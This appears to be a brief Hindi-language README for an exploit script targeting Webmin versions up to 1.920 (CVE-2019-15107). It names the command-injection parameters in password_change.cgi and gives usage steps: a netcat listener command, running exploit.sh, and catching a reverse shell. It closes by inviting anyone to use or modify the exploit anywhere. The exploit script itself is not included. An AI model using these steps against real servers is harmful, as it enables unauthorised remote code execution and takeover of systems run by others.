
webmin <=1.920 - कमांड इंजेक्शन भेद्यता के माध्यम से RCE
https://www.cvedetails.com/cve/CVE-2019-15107/
Webmin <=1.920 में एक समस्या पाई गई। password_change.cgi में "old" और "expire" पैरामीटर में कमांड इंजेक्शन कमजोरी है।
rlwrap -cAr nc -lvp 1919
./exploit.sh
इसे चलने दें, लिसनर पर एक रिवर्स शेल प्राप्त होता है।

जब चाहें और जहाँ चाहें इसका उपयोग या संशोधन करने के लिए स्वतंत्र महसूस करें।